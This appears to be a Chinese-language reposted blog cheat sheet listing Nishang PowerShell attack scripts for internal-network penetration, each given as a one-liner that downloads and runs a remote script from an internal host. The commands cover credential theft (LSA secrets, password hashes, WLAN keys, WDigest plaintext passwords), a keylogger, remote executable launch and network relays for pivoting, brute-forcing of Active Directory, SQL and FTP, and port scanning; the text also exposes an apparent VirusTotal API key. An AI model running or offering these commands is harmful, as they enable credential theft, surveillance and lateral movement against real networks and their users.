Get-Information:
信息收集:包括运行窗口历史记录如:FTP访问、共享连接、
putty连接
驱动、应用程序、hosts文件、进程、无线网络记录:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-Information.ps1'); Get-Information"
Get-LSASecret:
从目标获取LSA机密。
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-LSASecret.ps1'); Get-LsaSecret"
Get-PassHashes
获取密码Hash:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHashes.ps1'); Get-PassHashes"
Get-WLAN-Keys:
获取无线连接历史密码:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-WLAN-Keys.ps1'); Get-WLAN-Keys"
Keylogger:
键盘记录: (无测试)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Keylogger.ps1'); Keylogger"
Invoke-MimikatzWdigestDowngrade
转储在Windows8.1和Server 2012的纯用户密码(测试失败)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Invoke-MimikatzWDigestDowngrade.ps1'); MimikatzWDigestDowngrade"
Get-PassHints:
获取Windows用户的密码提示从目标。
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHints.ps1'); Get-PassHints"
Pivot
Create-MultipleSessions
检查在多台计算机证书,并创建PSSession中。:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Create-MultipleSessions.ps1'); Create-MultipleSessions -filename .servers.txt"
例子:
PS > Create-MultipleSessions -filename .servers.txt
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
.EXAMPLE
PS > Create-MultipleSessions -filename .servers.txt -Creds
Above command asks the user to provide username and passowrd to check on remote computers.
.EXAMPLE
PS > Create-MultipleSessions -filename .servers.txt -CreateSessions
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.
Run-EXEonRemote(没测试过)
运行EXEonRemote复制和多台计算机上执行的可执行文件。
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Run-EXEonRemote.ps1'); Invoke-Command -FilePath .Run-EXEonRemote.ps1 -ComputerName (Get-Content .servers.txt)"
Invoke-NetworkRelay
Invoke-NetworkRelay Create network relays between computers.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Invoke-NetworkRelay.ps1'); Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141"
Prasadhak
Prasadhak
检查运行正在运行的进程对VirusTotal数据库的哈希值。
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Prasadhak/Prasadhak.ps1'); Prasadhak -APIKEY 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0"
Scan
Brute-Force
爆力破解:FTP、活动目录、mssql、Sharepoint.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Invoke-BruteForce.ps1'); Invoke-BruteForce"
例子:
.EXAMPLE
PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service SQL -Verbose
Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt
.EXAMPLE
PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose
Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt.
Since StopOnSuccess is specified, the brute forcing stops on first success.
.EXAMPLE
PS > cat C:testservers.txt | Invoke-BruteForce -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service SQL -Verbose
Brute force SQL Service on all the servers specified in servers.txt
Port-Scan
端口扫描:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Port-Scan.ps1'); Port-Scan -StartAddress 192.168.4.1 -EndAddress 192.168.4.254"
例子:
.PARAMETER TimeOut
Time (in MilliSeconds) before TimeOut, Default set to 100
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
.EXAMPLE 扫描整个段存活
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
.EXAMPLE 扫描默认端口
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
Use above to do a port scan on default ports.
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
实用脚本:
Download
下载文件到目标:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Utility/Download.ps1'); Download http://192.168.4.4/php.txt netfile.txt"
下载的默认路径
C:UsersAdministratorAppDataLocalTemp
导入全部当前脚本:
PS > Import-Module .nishang.psm1
PS > . C:nishangGatherGet-Information.ps1
PS > Get-Information
PS > Get-Help [scriptname] -full //获取帮助
本文始发于微信公众号(关注安全技术):一些内网渗透所用Poweshell脚本(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论